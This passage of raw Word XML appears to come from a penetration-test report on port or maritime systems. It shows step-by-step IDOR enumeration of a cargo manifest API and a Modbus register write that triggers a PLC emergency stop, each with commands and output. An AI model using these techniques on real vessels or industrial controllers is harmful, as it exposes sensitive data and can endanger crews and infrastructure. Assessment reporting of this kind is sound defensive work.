              <w:t xml:space="preserve">Longitude    : 34.8 E</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Speed        : 12.3 knots</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Course       : 045 degrees NE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nav Status   : Under way using engine</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Total vessels tracked in 1-hour capture: 23 vessels</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[!] IMPACT: Real-time positions of 23 vessels captured.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    Intelligence usable for piracy or smuggling evasion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.4 Flaw #12 — IDOR in Cargo Manifest API (Burp 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Vulnerable Endpoint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/api/cargo/manifest?id={vessel_id}</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Attack Family</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Application Logic — OWASP A01:2021 (Ch.7)</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Tool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Burp Suite Intruder + Repeater</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CVSS Score</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8.1 — High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Authenticated Request for Own Vessel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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/cargo/manifest?id=V-10045 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</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Response: {"vessel_id":"V-10045","cargo":[...own cargo...]}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Modify ID — Access Another Vessel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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Changed id from V-10045 to V-10046 (same token):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/cargo/manifest?id=V-10046 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9... (unchanged)</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Response: {"vessel_name":"ROYAL SAUDI NAVY SUPPLY-04",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           "cargo":[{"item":"classified_equipment",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                      "qty":24,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                      "dest":"NEOM Base Alpha"}]}</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Burp Intruder — enumerate V-10001 to V-10200:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] 187 of 200 vessel manifests returned — NO auth check</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[!] IMPACT: Classified cargo and destinations of 187 vessels exposed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">9.5 Flaw #17 — Unencrypted SCADA / Modbus Communication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Target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172.16.20.10 — Schneider Modicon M340 PLC (Port 502)</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Attack Family</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Network + Injection (Ch.7)</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Tools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Nmap Modbus NSE + Wireshark + Python Modbus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CVSS Score</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9.8 — Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Identify SCADA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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap -sV -p 502 172.16.20.10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">502/tcp open modbus  Modbus/TCP (Schneider Electric PLC)</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nmap --script modbus-discover 172.16.20.10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| Vendor  : Schneider Electric</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| Device  : Modicon M340 PLC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| Version : 2.60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Intercept Modbus Traffic in Wireshark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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Wireshark display filter: modbus</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Captured Register Values — ALL PLAINTEXT:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Register[0]: 0x0001  Pump Status    : ON</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Register[1]: 0x00F4  Flow Rate      : 244 L/min</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Register[2]: 0x0032  Valve Position : 50%</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Register[3]: 0x0000  Emergency Stop : OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Inject Malicious Write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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># No authentication required on Modbus TCP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ python3 modbus_inject.py --host 172.16.20.10 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --function 6 --address 3 --value 1</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Function 6 = Write Single Register</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Address 3  = Emergency Stop register</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Value 1    = STOP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] Write successful — Emergency Stop triggered</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[!] IMPACT: Port fuel pump stopped remotely.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    Attacker can cause physical infrastructure damage</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    and endanger vessel and crew safety.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Risk Rating Summary</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700"/>
        <w:gridCol w:w="1350"/>
        <w:gridCol w:w="1350"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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 Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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 of Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">40%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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bCs/>
                <w:color w:val="E26B0A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">50%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="135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100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
